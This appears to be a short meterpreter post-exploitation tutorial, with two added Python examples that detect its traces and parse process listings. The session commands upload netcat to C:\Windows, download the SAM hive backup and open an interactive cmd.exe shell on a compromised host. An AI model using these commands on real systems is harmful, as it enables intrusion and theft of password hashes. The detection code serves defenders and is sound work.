There are various ways of deploying the meterpreter payload. This short article deals with deploying meterpreter as an exploit payload. This article is not about exploiting the machine! I assume here that you have already done that. Assuming I have gained a meterpreter shell on my exploited machine, I want to upload netcat to the 'windows' directory, and download the 'not so hidden' SAM file backup in the windows\repair directory.
meterpreter > upload /home/tools/nc.exe c:\windows
[*] uploading  : /home/tools/nc.exe -> c:\windows
[*] uploaded   : /home/tools/nc.exe -> c:\windows\nc.exe
meterpreter >
meterpreter > download c:\windows\repair\sam /tmp
[*] downloading: c:\windows\repair\sam -> /tmp
[*] downloaded : c:\windows\repair\sam -> /tmp/sam
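From the defender's side, the two actions in the session above leave very ordinary file-system traces: an executable appears in C:\Windows, and the SAM hive backup in C:\Windows\repair is read. The following is an added example, not code from the article: a small detection routine run over constructed telemetry in a simplified pipe-delimited format (timestamp|event|image|target) that stands in for real endpoint logs such as Sysmon file-create events or object-access auditing. The allowlist of trusted writers and the set of hive-backup paths are assumptions to tune for your own environment.

```python
"""Detect the two file-system side effects of the session above.

Added example, not part of the original article. The log format is a
constructed, simplified one (timestamp|event|image|target); map it onto the
telemetry you actually collect.
"""
from __future__ import annotations

import ntpath  # Windows path handling on any host OS

# Processes that legitimately write executables into C:\Windows.
# Assumed allowlist for illustration; tune it to your environment.
TRUSTED_WRITERS = {"trustedinstaller.exe", "msiexec.exe", "tiworker.exe"}

# Backup copies of the credential-bearing registry hives (the file the
# article downloads). Any read of these is worth an alert.
HIVE_BACKUPS = {
    r"c:\windows\repair\sam",
    r"c:\windows\repair\system",
    r"c:\windows\repair\security",
}

# Constructed sample telemetry: one legitimate servicing write, the nc.exe
# drop, the SAM backup read, and an unrelated user file read.
SAMPLE_LOG = "\n".join([
    r"2024-01-01T10:00:01|FileCreate|C:\Windows\servicing\TrustedInstaller.exe|C:\Windows\system32\ntoskrnl.exe",
    r"2024-01-01T10:02:13|FileCreate|C:\Program Files\vulnapp\server.exe|C:\Windows\nc.exe",
    r"2024-01-01T10:03:40|FileRead|C:\Program Files\vulnapp\server.exe|C:\Windows\repair\sam",
    r"2024-01-01T10:04:00|FileRead|C:\Windows\explorer.exe|C:\Users\bob\notes.txt",
])


def parse(line: str) -> dict[str, str] | None:
    """Split one log line into fields; return None for malformed lines."""
    parts = line.rstrip("\n").split("|")
    if len(parts) != 4:
        return None
    ts, event, image, target = parts
    return {"ts": ts, "event": event, "image": image, "target": target}


def is_exe_drop_in_windows(ev: dict[str, str]) -> bool:
    """An .exe created anywhere under C:\\Windows by a non-trusted process."""
    target = ev["target"].lower()
    writer = ntpath.basename(ev["image"]).lower()
    return (
        ev["event"] == "FileCreate"
        and target.startswith(r"c:\windows" + "\\")
        and target.endswith(".exe")
        and writer not in TRUSTED_WRITERS
    )


def is_hive_backup_read(ev: dict[str, str]) -> bool:
    """Any read of the repair-directory hive backups."""
    return ev["event"] == "FileRead" and ev["target"].lower() in HIVE_BACKUPS


def detect(log_text: str) -> list[str]:
    """Return one alert string per matching event, in log order."""
    alerts: list[str] = []
    for line in log_text.splitlines():
        ev = parse(line)
        if ev is None:
            continue
        if is_exe_drop_in_windows(ev):
            alerts.append(f"{ev['ts']} executable dropped in Windows dir: "
                          f"{ev['target']} by {ev['image']}")
        elif is_hive_backup_read(ev):
            alerts.append(f"{ev['ts']} registry hive backup read: "
                          f"{ev['target']} by {ev['image']}")
    return alerts


if __name__ == "__main__":
    for alert in detect(SAMPLE_LOG):
        print(alert)
```

Run as a script it prints two alerts for the constructed sample: the nc.exe drop and the SAM backup read. The comparison is done on lower-cased paths because NTFS is case-insensitive, and the writer allowlist is keyed on the image file name only; in production you would want to key on the full, signed image path.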
Let's take a look at the process list ...
meterpreter > ps

Process list
============

 PID   Name          Path
 ---   ----          ----
 404   smss.exe      \SystemRoot\System32\smss.exe
 476   csrss.exe     \??\C:\WINDOWS\system32\csrss.exe
 648   winlogon.exe  \??\C:\WINDOWS\system32\winlogon.exe
 . . .
There's more, and you might be looking for a particular process. For this example I just wanted to show the command, simple as it is.
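When the listing is long, it is easier to parse it than to read it. The following is an added example, not code from the article: it parses a listing in the format shown above (the sample is reconstructed from the article with backslashes restored, plus two constructed rows), normalises the NT-style paths, finds the PID of a named process, and, from a responder's point of view, flags any process whose name is a well-known system binary but whose path is not the expected directory. The expected-directory table and the SystemRoot value are assumptions for illustration.

```python
"""Parse meterpreter `ps` output and answer two common questions:
which PID is a given process, and which well-known process names are
running from an unexpected directory.

Added example, not part of the original article. SAMPLE_PS is reconstructed
from the article (backslashes restored) with two constructed extra rows.
"""
from __future__ import annotations

import ntpath
import re

SAMPLE_PS = """\
Process list
============

 PID   Name          Path
 ---   ----          ----
 404   smss.exe      \\SystemRoot\\System32\\smss.exe
 476   csrss.exe     \\??\\C:\\WINDOWS\\system32\\csrss.exe
 648   winlogon.exe  \\??\\C:\\WINDOWS\\system32\\winlogon.exe
 1055  cmd.exe       C:\\WINDOWS\\system32\\cmd.exe
 1100  svchost.exe   C:\\Users\\Public\\svchost.exe
"""

# Where these names are expected to live on a default install.
# Assumed table for illustration; extend it for your baseline.
EXPECTED_DIR = {
    "smss.exe": r"c:\windows\system32",
    "csrss.exe": r"c:\windows\system32",
    "winlogon.exe": r"c:\windows\system32",
    "svchost.exe": r"c:\windows\system32",
    "cmd.exe": r"c:\windows\system32",
}

# A data row is: PID, a name without spaces, then the rest is the path.
ROW = re.compile(r"^\s*(\d+)\s+(\S+)\s+(.*?)\s*$")


def normalize(path: str, system_root: str = r"C:\WINDOWS") -> str:
    """Strip the NT object-manager prefix and expand \\SystemRoot.

    system_root is an assumption here; on a real host take it from the
    target's environment.
    """
    p = path
    if p.startswith("\\??\\"):
        p = p[4:]
    if p.lower().startswith("\\systemroot\\"):
        p = system_root + p[len("\\SystemRoot"):]
    return p.lower()


def parse_ps(text: str) -> list[dict]:
    """Return one record per data row; title, header, rule and '...' lines are skipped."""
    procs = []
    for line in text.splitlines():
        m = ROW.match(line)
        if not m:
            continue
        pid, name, path = m.groups()
        procs.append({"pid": int(pid), "name": name.lower(), "path": normalize(path)})
    return procs


def find_pids(procs: list[dict], name: str) -> list[int]:
    """All PIDs whose image name matches (case-insensitive)."""
    return [p["pid"] for p in procs if p["name"] == name.lower()]


def unexpected_paths(procs: list[dict]) -> list[dict]:
    """Well-known names running from somewhere other than their expected directory."""
    return [
        p for p in procs
        if p["name"] in EXPECTED_DIR
        and ntpath.dirname(p["path"]) != EXPECTED_DIR[p["name"]]
    ]


if __name__ == "__main__":
    procs = parse_ps(SAMPLE_PS)
    print("cmd.exe PIDs:", find_pids(procs, "cmd.exe"))
    for p in unexpected_paths(procs):
        print(f"suspicious: pid {p['pid']} {p['name']} at {p['path']}")
```

The regex anchors on a leading integer, so the "Process list" title, the "PID Name Path" header, the dashed rule and the ". . ." truncation marker are all skipped without special-casing. In the constructed sample the svchost.exe running from C:\Users\Public is the only row that fails the expected-directory check.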
Now I want a DOS prompt (cmd.exe) and want to interact with it.
meterpreter > execute -f cmd.exe -c
Process 1055 created.
Channel 2 created.
meterpreter > interact 2
Interacting with channel 2...
Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.

C:\Program Files>exit
exit
meterpreter >
... and there you have it.